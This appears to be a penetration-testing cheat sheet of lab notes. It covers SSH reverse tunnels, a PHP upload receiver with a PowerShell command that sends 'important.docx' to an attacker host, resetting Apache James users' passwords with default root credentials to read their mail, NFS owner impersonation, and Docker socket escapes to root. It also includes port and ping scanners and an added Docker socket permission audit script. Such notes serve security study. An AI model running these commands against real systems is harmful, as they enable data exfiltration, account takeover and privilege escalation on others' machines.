# Random Bits

### stop output of errors in cmd

`COMMAND 2> /dev/null`

## web servers

```bash
# php
php -S 0.0.0.0:8000
# ruby
ruby -run -e httpd . -p 9000
# busybox
busybox httpd -f -p 10000
```

## SSH

### Rev shell

`ssh.exe -R 48172 -N`

### Output to null

`ssh -o "UserKnownHostsFile=/dev/null" -N -o "StrictHostKeyChecking no" -i "c:/Software/key"`

`ssh -oKexAlgorithms=XXX -oHostKeyAlgorithms=XXX`

## File upload

### Apache

On Kali: put the script below inside /var/www/html/ (as upload.php), create an uploads folder (/var/www/uploads/) and chown it to www-data, then start Apache:

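```php
<?php
// Directory that receives the uploads; must be writable by www-data
$uploaddir = '/var/www/uploads/';
// basename() strips any directory components from the client-supplied name
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
```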

On Windows:

```powershell
powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
```

## Apache James

Change the users' passwords using root:root against port 4555, then check the mailboxes for info. The following can be used:

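```bash
# James admin console commands (port 4555), after logging in:
listusers
setpassword mailadmin 1234
# From bash: log in to POP3 as each user and list the mailbox
for user in mailadmin marcus jenny joe45 ryuu john; do (echo USER $user; sleep 1s; echo PASS 1234; sleep 1s; echo LIST; sleep 1s; echo QUIT)| nc -nvC 10.11.1.72 110; done
```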

## POP3

```
USER username
PASS password
LIST
RETR 1
```

## NFS

#### Enumerations:

```bash
showmount -e 10.11.1.72
```

#### Mount:

```bash
mount -t nfs -o vers=2 -o nolock 10.11.1.72:/home /nfs
```

**If a file is unreadable, change ownership to the value of the file's owner 😉**

## Docker

#### useful commands:

```bash
docker ps # show running containers
docker container exec -it CONTAINER_ID /bin/bash # interactive shell in a container
docker images # show all local images
```

#### socket write privesc:

```
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
```
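
Both commands above work for any account that can write to `/var/run/docker.sock`, so write access to the socket is equivalent to root on the host. An added audit check (not part of the original notes) that classifies the socket's permissions; the function names are hypothetical and `audit_socket` assumes GNU `stat` and `getent`:

```shell
#!/bin/sh
# Added example: audit write access to the Docker socket.
# Function names are illustrative; audit_socket assumes GNU stat and getent.

# classify_perms MODE OWNER GROUP
# MODE is the octal string printed by `stat -c %a`, e.g. 660.
classify_perms() {
    perm=$((0$1))   # leading 0 makes the shell parse the mode as octal
    clean=1
    if [ $(($perm & 0002)) -ne 0 ]; then
        echo "CRITICAL: world-writable"; clean=0
    fi
    if [ $(($perm & 0020)) -ne 0 ] && [ "$3" != "root" ]; then
        echo "WARN: group '$3' can write (members are root-equivalent)"; clean=0
    fi
    if [ "$2" != "root" ]; then
        echo "WARN: owner '$2' is not root"; clean=0
    fi
    if [ "$clean" -eq 1 ]; then echo "OK: root-only"; fi
}

# audit_socket [PATH]  (PATH defaults to /var/run/docker.sock)
audit_socket() {
    sock=${1:-/var/run/docker.sock}
    if [ ! -e "$sock" ]; then
        echo "SKIP: $sock not present"; return 0
    fi
    mode=$(stat -c %a "$sock")
    owner=$(stat -c %U "$sock")
    group=$(stat -c %G "$sock")
    echo "$sock mode=$mode owner=$owner group=$group"
    classify_perms "$mode" "$owner" "$group"
    # Every member of the owning group can drive the daemon, so list them.
    # getent shows supplementary members only, not users whose primary
    # group this is.
    if [ "$group" != "root" ]; then
        echo "members of $group: $(getent group "$group" | cut -d: -f4)"
    fi
}

# Runs only when a path is given: sh audit.sh /var/run/docker.sock
if [ "$#" -gt 0 ]; then audit_socket "$1"; fi
```
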

## one line scanners

#### Ping:

Windows (cmd.exe):

```bat
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.
```

Linux:

```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
```

#### Netcat

TCP:

```bash
nc -nvv -w 1 -z 10.11.1.220 3388-3390
```

UDP:

```bash
nc -nv -u -z -w 1 10.11.1.115 160-162
```
